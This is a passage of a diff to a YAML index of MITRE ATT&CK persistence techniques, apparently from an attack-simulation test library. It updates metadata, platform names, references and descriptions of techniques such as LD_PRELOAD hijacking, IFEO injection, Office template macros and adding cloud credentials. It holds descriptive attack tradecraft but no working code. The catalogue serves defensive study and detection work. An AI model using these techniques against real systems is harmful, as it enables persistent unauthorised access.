         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30065,7 +30487,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30085,29 +30506,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30184,12 +30607,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30204,6 +30626,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30212,18 +30635,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30255,9 +30678,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30329,7 +30749,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30356,7 +30775,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30382,13 +30801,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30509,7 +30926,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30581,7 +30997,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -30651,7 +31066,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -30761,7 +31175,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -30815,7 +31228,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30848,8 +31261,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -30880,7 +31291,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -30915,12 +31326,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -30997,7 +31406,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31051,7 +31459,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31083,7 +31490,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31113,55 +31520,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31192,6 +31554,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31201,9 +31564,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31211,11 +31578,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31247,7 +31650,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31295,13 +31698,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31314,16 +31715,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31335,16 +31736,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31399,7 +31800,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31460,7 +31860,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31536,7 +31935,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31564,8 +31963,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31591,7 +31988,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31616,23 +32013,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -31642,11 +32037,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -31657,12 +32056,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -31671,6 +32077,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31679,13 +32086,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -31711,10 +32121,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -31723,10 +32141,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31743,14 +32171,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
